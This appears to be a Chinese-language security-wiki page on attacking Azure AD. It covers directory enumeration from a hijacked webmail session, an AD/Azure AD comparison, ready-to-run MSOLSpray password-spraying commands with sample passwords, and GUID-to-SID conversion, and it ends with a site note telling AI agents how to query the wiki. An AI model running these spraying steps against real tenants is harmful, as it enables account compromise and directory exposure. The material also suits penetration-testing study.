# AzureAD ``` 对于 Microsoft,如果您将任何云服务(Office 365、Exchange Online 等)与 Active Directory(本地或在 Azure 中)一起使用,那么攻击者只需一个凭证就可以通过 Azure AD泄露您的整个 Active Directory 结构 验证您的网络邮件门户(即https://webmail.domain.com/) 将浏览器 URL 更改为:https ://azure.microsoft.com/ 从活动会话中选择帐户 选择 Azure Active Directory ``` | Active Directory | Azure AD | | -------------------------------- | ----------------- | | LDAP | REST API'S | | NTLM/Kerberos | OAuth/SAML/OpenID | | Structured directory (OU tree) | Flat structure | | GPO | No GPO's | | Super fine-tuned access controls | Predefined roles | | Domain/forest | Tenant | | Trusts | Guests | ``` 密码喷射 >git clone https://github.com/dafthack/MSOLSpray >Import-Module .\MSOLSpray.ps1 >Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 >Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme! 将 GUID 转换为 SID 通过连接"S-1–12–1-"到 AAD Id 的每个部分的十进制表示,将用户的 AAD id 转换为 SID。 GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)] SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)] 例如,表示6aa89ecb-1f8f-4d92–810d-b0dce30b6c82是S-1–12–1–1789435595–1301421967–3702525313–2188119011 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/yun-an-quan/azure/azuread.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.